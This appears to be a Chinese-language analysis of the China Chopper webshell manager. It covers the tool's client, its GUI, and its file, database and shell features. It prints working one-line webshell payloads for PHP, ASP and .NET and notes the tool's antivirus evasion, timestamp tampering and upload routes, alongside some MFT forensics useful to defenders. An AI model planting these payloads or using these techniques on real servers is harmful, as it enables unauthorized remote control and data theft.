十大黑客工具之中國菜刀(Chopper)
Chopper是中國黑客圈內使用非常廣泛的一款Webshell管理工具。中國菜刀用途十分廣泛,支持多種語言,小巧實用。
Web Shell客戶端
中國菜刀的客戶端可在www.maicaidao.com下載到。
- Web shell (CnC) Client MD5
- caidao.exe 5001ef50c7e869253a7c152a638eab8a
注:這里可以對你的下載菜單的MD5值是否相同,如果不同則有可能加了后門或者捆綁了木馬。
客戶端使用UPX加殼,有220672個字節大小,如圖1所示:
使用脫殼工具脫殼,可以看到一些隱藏的細節:
- C:Documents and SettingsAdministratorDesktop>upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C) 1996 - 2011
- UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
- File size Ratio Format Name
- -------------------- ------ ----------- -----------
- 700416 <- 220672 31.51% win32/pe decomp.exe
- Unpacked 1 file.
使用PEID(一個免費檢測軟件使用的加殼手法的工具),我們可以看到解壓縮后的客戶端程序使用Visual C + + 6.0編寫,如圖2所示:
因為字符串沒有進行編碼,所以可以通過打印輸出該后門如何通信,我們可以看到一個url google.com.hk(圖3),以及參考文本Chopper(圖4)。
打開中國菜刀界面,我們可以看到該工具是一款圖形界面工具,并且提供了添加自己的目標、管理的功能,在客戶端軟件上,右鍵單擊選擇“添加”,輸入IP地址,以及密碼和編碼方式,如圖5所示:
服務端payload組件
中國菜刀的工具是一款Webshell管理工具,相應必然有一個服務端的程序,它支持各種語言,如ASP、ASPX、PHP、JSP、CFM,一些官網下載原始程序MD5 HASH如下:
- Web shell Payload MD5 Hash
- Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08
- Customize.cfm ad8288227240477a95fb023551773c84
- Customize.jsp acba8115d027529763ea5c7ed6621499
例子如下:
- PHP: <?php @eval($_POST['pass']);?>
- ASP: <%eval request("pass")%>
- .NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
在實際使用過程中,替換PASS為鏈接的時候需要的密碼。
功能
上面簡單介紹了中國菜刀的客戶端和服務端的,下面來介紹下該款工具的其他功能,中國菜刀包含了“安全掃描”功能,攻擊者能夠使用爬蟲或暴力破解來攻擊目標站點,如下圖:
在除了發現漏洞之外,中國菜刀最強大的莫過于管理功能了,包含以下內容:
- 文件管理(文件資源管理器)
- 數據庫管理(DB客戶端)
- 虛擬終端(命令行)
在中國菜刀的客戶端界面中,右鍵單擊一個目標可以查看相應的功能列表,如圖7:
文件管理
中國菜刀作為一個遠程訪問工具(RAT),包含了常見的上傳、下載、編輯、刪除、復制、重命名以及改變文件的時間戳。如圖8:
修改文件功能現在常見的webshell就帶了該功能,圖9顯示了測試目錄的三個文件,因為Windows資源管理器只顯示“修改日期”字段,所以通常情況下,能夠達到隱藏操作的目的。
使用工具將文件修改和其他兩個文件相同,如圖10,可以看到文件的修改的日期和其他兩個文件一致,如果不是專業的人士,一般不會看出這幾個文件的區別:
當文件的創建日期和修改日期被修改之后,查出異常文件非常麻煩,需要分析主文件表MFT以及FTK,fireeye建議使用工具mftdump來進行分析,該工具能夠提取文件元數據進行分析。
下表顯示了從MFT中提取的Webshell時間戳,注意”fn*”字段包含了文件的原始時間。
- Category Pre-touch match Post-touch match
- siCreateTime (UTC) 6/6/2013 16:01 2/21/2003 22:48
- siAccessTime (UTC) 6/20/2013 1:41 6/25/2013 18:56
- siModTime (UTC) 6/7/2013 0:33 2/21/2003 22:48
- siMFTModTime (UTC) 6/20/2013 1:54 6/25/2013 18:56
- fnCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01
- fnAccessTime (UTC) 6/6/2013 16:03 6/6/2013 16:03
- fnModTime (UTC) 6/4/2013 15:42 6/4/2013 15:42
- fnMFTModTime (UTC) 6/6/2013 16:04 6/6/2013 16:04
數據庫管理
中國菜刀支持各種數據庫,如MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等,數據庫操作界面,內置了一些常用的數據庫語句,能夠自動顯示表名、列名,查詢語句,并且內置了常用的數據庫語句。如下圖11:
鏈接之后,菜刀提供了一些常見的數據庫語句,如圖12:
命令行功能
最后,菜刀提供了一個命令行界面,能夠通過命令行shell進行操作系統級別的互動,當然繼承的權限是WEB應用的權限。如圖13:
Payload屬性
除了以上的功能之外,中國菜刀的能夠在黑客圈廣泛使用,還有以下幾個因素:
- 大小
- 服務端內容
- 客戶端內容
- 是否免殺
大小
中國菜刀的服務端腳本非常小,是典型的一句話木馬,其中aspx服務端軟件只有73字節,見圖14,相比其他傳統的webshell可見它的優越性。
服務端內容
中國菜刀的服務端代碼除了簡潔之外,并且支持多種加密、編碼。
客戶端內容
在瀏覽器不會產生任何客戶端代碼,如圖16:
殺毒軟件檢測:
大多數殺毒軟件不能檢測出該工具。如下圖:
在第一部門份的菜刀剖析里面,已經介紹了“中國菜刀”的易用界面以及一些高級特性。——其中最令人注目的,莫過于其作為web shell的大小,aspx版僅有73字節,在硬盤中才4k。而在這部分里,將會詳細“中國菜刀”平臺適用性、上傳機制、通訊模式以及如何偵測,至于中國菜刀一直在爭論的一個話題,有沒有后門,各位基友,您看了就知道了。
平臺:
web服務器平臺——JSP, ASP, ASPX, PHP, 或 CFM。同時在Windows和Linux適用。在系列一的分析里面已經展示過“中國菜刀”在windows 2003 IIS 中運行ASPX的情況。在這一部分里,講展示運行在Linux平臺下的PHP情況。如下圖所示,PHP版本的內容極其精簡。
依賴與不同的平臺,“中國菜刀”有不同的可選項。下圖顯示了在Linux平臺下的文件管理特性,(類似于Windows)
上傳機制:
由于它的大小,格式,以及簡單的payload,“中國菜刀”的傳輸機制可以很靈活多樣。以下任意一種方法都可以進行傳輸:
- 通過WebDAV文件上傳
- 通過JBoss jmx-console 或者Apache的Tomcat管理頁面上傳
- 遠程代碼執行下載
- 通過其他方式接入后傳輸
通訊分析:
我們已經看過它在服務器端的payload以及控制web shell的客戶端。接下來,我們檢查一下“中國菜刀”的通訊網絡流量。我們通過抓包軟件,分析其服務端和客戶端的通訊情況。
利用抓包軟件Wireshark的“follow the TCP”功能可以看到整個TCP數據交互過程。
